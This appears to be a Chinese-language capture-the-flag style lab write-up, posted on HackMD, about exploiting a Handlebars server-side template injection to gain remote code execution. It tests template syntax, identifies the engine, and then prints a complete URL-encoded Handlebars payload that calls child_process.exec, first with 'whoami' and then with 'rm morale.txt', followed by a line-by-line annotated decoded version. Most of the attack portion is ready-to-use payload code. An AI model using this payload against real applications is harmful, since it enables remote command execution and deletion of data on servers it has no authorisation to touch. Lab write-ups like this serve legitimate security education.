SSTI Lab4 - HackMD

# SSTI Lab4 本題是一個典型的 Handlebars Server-Side Template Injection (SSTI) 利用範例，未知的 template engine，要找出是哪一種 template，用已知漏洞執行遠端程式碼 (RCE)，最終目標是刪掉 morale.txt。一樣先進入網站。 ![image](https://hackmd.io/_uploads/rJf5R9Uvel.png) 在瀏覽網站的時後可以發現在 URL 的地方一樣是直接全部渲染出來。 ![image](https://hackmd.io/_uploads/BkBsRqIvxx.png) 這裡可以試試幾種模板語法來觀察結果，發現在測試運算類型的時候報錯，從錯誤訊息可以猜測有可能是 Handlebars 的 SSTI Exploit。不過我們該如何去破解他，在 [Hack tricks](https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html) 中可以查詢到相關資料： ![image](https://hackmd.io/_uploads/rkTmbsIvgx.png) UR Lencoded: ```url %7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D ``` 而將這串丟到 URL 後面可以發現有噴出一些東西給我們。 ![image](https://hackmd.io/_uploads/BkNWGiIDge.png) 所以一樣嘗試 rm 目標檔案。 UR Lencoded: ```url %7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27rm+morale.txt%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D ``` :::info ### 剛剛那串 URL 是啥鬼？？？ ```java wrtz{{#with "s" as |string|}} // 宣告一個 string 變數（值為 "s"） {{#with "e"}} // 開一個巢狀 block，佔位置 {{#with split as |conslist|}} // 把 split 當陣列，用來存 constructor {{this.pop}} // 清空舊陣列 {{this.push (lookup string.sub "constructor")}} → 加入 constructor function {{this.pop}} // 把 constructor 拿出來 {{#with string.split as |codelist|}} // 準備放要執行的程式碼 {{this.pop}} // 清空舊的 {{this.push "return require('child_process').exec('rm morale.txt');"}} // 放入你要執行的 payload {{this.pop}} // 拿出來 {{#each conslist}} // 對 constructor 做 apply {{#with (string.sub.apply 0 codelist)}} // 呼叫 constructor.apply(0, codelist) {{this}} // 執行 payload {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} ``` ::: ---